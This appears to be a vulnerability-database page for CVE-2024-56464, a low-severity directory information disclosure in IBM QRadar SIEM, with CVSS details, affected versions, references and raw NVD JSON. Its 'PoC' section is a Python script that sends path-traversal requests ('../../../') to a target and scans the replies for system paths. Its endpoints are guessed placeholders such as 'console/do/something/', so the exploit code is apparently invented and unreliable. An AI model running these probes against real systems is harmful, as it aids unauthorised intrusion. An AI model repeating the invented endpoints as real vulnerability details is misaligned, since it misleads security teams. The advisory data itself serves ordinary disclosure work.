CVE-2024-56464

Description

IBM QRadar SIEM 7.5 - 7.5.0 UP14 IF01 is affected by an information disclosure vulnerability involving exposure of directory information. IBM has addressed this vulnerability in the latest update.

CVSS Details

CVSS Score

2.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_10:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_11:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_12:*:*:*:*:*:* - VULNERABLE

IBM QRadar SIEM 7.5

IBM QRadar SIEM 7.5.0 UP14 IF01及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2024-56464 PoC - IBM QRadar SIEM Directory Information Disclosure
# Note: This is a conceptual PoC for educational purposes only

import requests
import sys
from urllib.parse import urljoin

def check_vulnerability(target_url):
    """
    Check if target IBM QRadar SIEM is vulnerable to CVE-2024-56464
    """
    # Normalize URL
    if not target_url.endswith('/'):
        target_url += '/'
    
    # Known vulnerable endpoints that may expose directory information
    vulnerable_paths = [
        'console/qrdarun.jsp?appName=../../../',
        'api/siem/offenses?sort=&range=1-1000',
        'console/do/something/siemplatform/',
        'console/do/something/../../',
    ]
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2024-56464 - IBM QRadar SIEM Directory Information Disclosure")
    print("=" * 60)
    
    # Attempt to access potentially vulnerable endpoints
    for path in vulnerable_paths:
        try:
            url = urljoin(target_url, path)
            response = requests.get(url, timeout=10, verify=False)
            
            # Check for signs of directory information disclosure
            if response.status_code == 200:
                content = response.text
                # Look for directory listing patterns
                if any(indicator in content.lower() for indicator in 
                       ['directory', 'listing', 'parent directory', 
                        '/opt/', '/etc/', '/var/log', 'path:', 'file:']):
                    print(f"[+] Potential vulnerability found at: {url}")
                    print(f"[+] Response contains directory information")
                    return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {url}: {str(e)}")
    
    print("[*] No obvious vulnerability indicators found")
    print("[*] Note: Actual exploitation requires authenticated access")
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} https://qradar.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-56464
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-56464
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-56464/
[4] VulDB https://vuldb.com/cve/CVE-2024-56464
[5] https://www.ibm.com/support/pages/node/7253664

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-56464", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:28.403", "lastModified": "2025-12-15T18:29:07.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM QRadar SIEM 7.5 - 7.5.0 UP14 IF01 is affected by an information disclosure vulnerability involving exposure of directory information. IBM has addressed this vulnerability in the latest update."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-548"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:-:*:*:*:*:*:*", "matchCriteriaId": "DACA17CC-8B71-4E71-B075-BFFB65AD989C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_1:*:*:*:*:*:*", "matchCriteriaId": "BA60FDE5-8C40-4C7A-97CF-BA2A64BF307D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_10:*:*:*:*:*:*", "matchCriteriaId": "3D6ADD3A-99BC-495F-9835-92D16DF18FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_11:*:*:*:*:*:*", "matchCriteriaId": "5C899CFD-26F5-43FA-A39E-7196E2929AD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_12:*:*:*:*:*:*", "matchCriteriaId": "0C534E65-D418-4A5E-B326-F449337C0408"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13:*:*:*:*:*:*", "matchCriteriaId": "A3F6494F-EC1B-4963-908A-88190E5BF835"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13_interim_fix_01:*:*:*:*:*:*", "matchCriteriaId": "4779E5F6-6CA5-4EF7-8C0C-DC13362DAE45"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_13_interim_fix_02:*:*:*:*:*:*", "matchCriteriaId": "17894E0A-F47C-416F-99E3-26B158B5F852"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_14:*:*:*:*:*:*", "matchCriteriaId": "CD7E8A56-06DB-45AC-9769-4B198B142CAA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_14_interim_fix_01:*:*:*:*:*:*", "matchCriteriaId": "605EA97A-BF41-4B49-8C79-43E62CDD29FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_2:*:*:*:*:*:*", "matchCriteriaId": "AB518E06-00BA-48F3-8AEC-6E1E97CAA2CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_3:*:*:*:*:*:*", "matchCriteriaId": "289027A2-178C-45DE-A86F-1207F23D13B1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_4:*:*:*:*:*:*", "matchCriteriaId": "5047AECF-879B-427A-ACF7-ECB10965E1B0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_5:*:*:*:*:*:*", "matchCriteriaId": "CD448AB8-E3CC-41A1-9D32-B1B35C68FA5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_6:*:*:*:*:*:*", "matchCriteriaId": "9F4014E8-42E2-4B76-B2DA-8B50929A4AB5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_7:*:*:*:*:*:*", "matchCriteriaId": "BD0A459A-C74A-4E18-83B3-4C29D47D2C2B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:qradar_security_information_and_event_manager:7.5.0:update_pack_8:*:*:*:*:*:*", "matchCriteriaId": "721EFDD7-EE35-430C-AF17-C54BDB10434E"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7253664", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}